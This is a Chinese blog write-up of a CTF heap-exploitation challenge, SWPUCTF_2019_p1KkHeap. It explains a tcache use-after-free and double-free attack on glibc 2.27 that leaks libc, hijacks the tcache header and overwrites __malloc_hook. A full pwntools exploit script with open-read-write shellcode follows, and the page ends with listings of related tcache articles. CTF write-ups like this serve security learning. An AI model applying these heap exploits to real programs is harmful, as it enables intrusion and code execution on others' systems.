SWPUCTF_2019_p1KkHeap(tcache表头攻击,uaf,ORW)

最新推荐文章于 2022-11-18 16:17:48 发布
最新推荐文章于 2022-11-18 16:17:48 发布
阅读量526 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121398983
版权

SWPUCTF_2019_p1KkHeap:

保护全开
请添加图片描述

程序分析:

开了沙盒我们看一下,可以看到禁用了execve,我们只能用orw组合读取flag
请添加图片描述

在0x6666000的地方给了我们一块可读可写可执行的区域
请添加图片描述
还有一些小限制,只能实行0x12次循环
请添加图片描述
free只能3次
请添加图片描述

malloc最大0x100,不让我们直接申请0x410能free到unsortbin
请添加图片描述

漏洞分析:

显然有个uaf

大致思路:

1.先利用uaf,泄露堆地址
2.doublefree后申请三次,让tcache_bin中的index改到-1,由于有符号转到无符号,就变到0xff,我们就能释放chunk到unsotbin中,泄漏libc了
3.利用doublefree,申请堆到tache的表头中对应存的链表指针,改为0x66660000,再填入orw
4.同理再改tache的表头中对应存的链表指针,改为malloc_hook,申请到malloc_hook我们填入0x66660000
5.最后add触发

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './SWPUCTF_2019_p1KkHeap'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26408 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#-------------------------------------
def add(size):
    sla('Your Choice: ','1')
    sla('size: ',str(size))
def show(index):
    sla('Your Choice: ','2')
    sla('id: ',str(index))
def edit(index,content):
    sla('Your Choice: ','3')
    sla('id: ',str(index))
    sa('content: ',content)
def delete(index):
    sla('Your Choice: ','4')
    sla('id: ',str(index))
#------------------------------------
add(0x100)
add(0x20)
delete(0)
delete(0)
show(0)
ru('content: ')
heap_base=uu64(ru('\n')[:-1])-0x260
print 'heap_base='+str(hex(heap_base))
#edit(0,p64(heap_base+0xc8))
add(0x100)
edit(2,p64(heap_base+0xc8))
add(0x100)
add(0x100)
edit(4,p64(0x66660000))
add(0x100)
shellcode=shellcraft.amd64.open('flag')
shellcode+=shellcraft.amd64.read(3,0x66660300,64)
shellcode+=shellcraft.amd64.write(1,0x66660300,64)
shell=asm(shellcode)
edit(5,shell)
delete(0)
show(0)
malloc_hook=uu64(ru('\x7f')[-6:])-96-0x10
print 'malloc_hook='+str(hex(malloc_hook))
#-------------------------------------
edit(4,p64(malloc_hook))
add(0x100)
edit(6,p64(0x66660000))
add(0x100)
#debug()
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn Heap With Tcache
weixin_30925411的博客
08-03 213
Pwn Heap With Tcache 前言 glibc 2.26 开始引入了 tcache , 相关的 commit 可以看 这里 。加入 tcache 对性能有比较大的提升,不过由于 tcache 的存在 ,一些利用方式的限制条件就少了许多。具体往下看。 相关文件位于 https://gitee.com/hac425/blog_data/tree/master/tcache_pwn 修改自...
gyctf_2020_signin(calloc特性,uaftcache特性)
m0_51251108的博客
11-04 475
gyctf_2020_signin: 参考师傅:yongbaoii 逆向分析: 主界面: 三个功能,add,edit,free,还有个backdoor add函数: edit函数: free函数: 有个标记检查,doublefree不能用了 backdoor: 还有个calloc函数 这里分配一个0x70大小的chunk calloc 有以下特性 不会分配 tcache chunk 中的 chunk 。 tcache 有以下特性 在分配 fastbin 中的 chunk 时若还有其他相同大
how2heap(6):tcache_stashing_unlink_attack 2.31
hollk’s blog
09-14 545
tcache_stashing_unlink_attack 主要利用的是small bin链表中摘堆块后重新排列进tcache的原理 源码 //gcc -g tcache_stashing_unlink_attack.c -o tcache_stashing_unlink_attack_231 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <assert.h> 4 5 int main()
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1052
浙江省第五届大学生网络与信息安全竞赛预赛pwn
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
PLpa的博客
06-06 1068
在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注意libc版本。 对tcache不是很了解建议看看CTFWiKi 1.[V&N2020 公开赛]easyTHeap 保护全开,libc2.27版本,进入IDA 看到程序有增删改查的功能。 我们一个个来看: add: 我们可以看到add中不能写入数据。 edit: add中不能读入的数据由edit来读入。 show: 没什么特殊的,就是输出数据,这里我们可以用其来查看我们泄露的地址。 dele
heap_exploit_2.31
03-21
攻击2.31 glibc 2.31版中有关ptmalloc的堆利用。 堆开发清单 在2.29和2.31之间进行堆利用技术,并收集有关相应利用技术的CTF挑战。 技术 文件 CTF挑战 tcache隐藏链接攻击 2019 Hitcon一拳超人 tcache藏匿取消...
glibc_ptmalloc_learning
05-15
- tcache优化:tcache的存在显著提升了小内存分配的性能,但需合理设置tcache的大小以平衡内存占用和性能。 深入理解glibc的ptmalloc内存分配机制,有助于我们编写更高效、更健壮的C程序,避免内存泄漏和内存碎片...
TCache-开源
04-25
TCache,作为一款开源的高性能键/值存储组件,旨在为现有的分布式内存对象缓存系统如Memcached或Dynamo提供增强的功能,以提升动态Web应用程序的速度并减轻数据库的负载。这款工具的核心价值在于其能够有效地缓存...
Glibc 2.27关于Tcache的增强保护 .pdf
09-05
这可以防止恶意攻击者通过创建大量缓存项来消耗资源,或者利用过度填充的Tcache进行攻击。这种限制使得Tcache的使用更加可控,增加了系统的安全性。 3. **tcache_put函数的改进**:在旧版本中,tcache_put函数直接...
【技术分享】glibc 2.27-2.32版本下Tcache Struct的溢出利用 .pdf
09-05
- **修改Tcache最大数量**:TCACHE_MAX_BINS是常量,但通过大型bin攻击或未排序bin攻击,可以写入大数值到`mp_.tcache_bins`,绕过TCACHE_MAX_BINS的限制。 - **伪造Tcache Struct内容**: - 在glibc 2.30之前的...
从hacknote了解UAF漏洞
weixin_44864859的博客
07-07 623
首先查看程序的基本功能,基本的菜单形式,主要提供了三个功能,创建,删除,打印。(即malloc堆块,free堆块,printf堆块中的数据) 查看程序基本信息 拖进ida中进行伪代码审计,由于此题没有去掉符号表,因此审计相对比较简答。创建和打印部分的代码均没有什么漏洞,在删除功能处可以发现很明显的UAF漏洞,在free掉content指针和结构体指针后均没有将其置为NULL。 另外可以找到程序中存在后门函数magic 进行调试分析,首先创建两个note(note0和note1),大小都为0x10,g
pwn 堆入门之tcache
清霂的博客
05-13 466
目录ciscn_final_3ciscn_2019_es_1 ciscn_final_3 #!/usr/bin/env python3 # coding=utf-8 from pwn import * arch = "amd64" filename = "ciscn_final_3" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc l
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 370
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
i春秋2020新春战役PWN之document(绕过tcache的double free检测)
seaaseesa的博客
02-27 3144
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup)
mcmuyanga的博客
03-10 990
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
[堆利用:TCache机制]hauseofAtum
Nashi_Ko的博客
03-27 576
[堆利用:TCache机制]hauseofAtum 题目链接:https://github.com/blue-lotus/BCTF2018/tree/master/pwn/houseofAtum 0x00 逆向分析 菜单: __int64 menu() { puts("1. new"); puts("2. edit"); puts("3. delete"); puts("4. show"); printf("Your choice:"); return getint(); } 功能
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3190
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2745
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1732
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn。
linux下gdb最终显示tcache_get错误,会是什么原因?
最新发布
07-13
当使用GDB调试程序时,如果最终显示 "tcache_get" 错误,可能是由于以下原因之一: 1. 未正确安装或配置glibc:GDB 是基于 glibc 的调试工具,如果 glibc 未正确安装或配置,可能会导致 tcache_get 错误。请确保...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值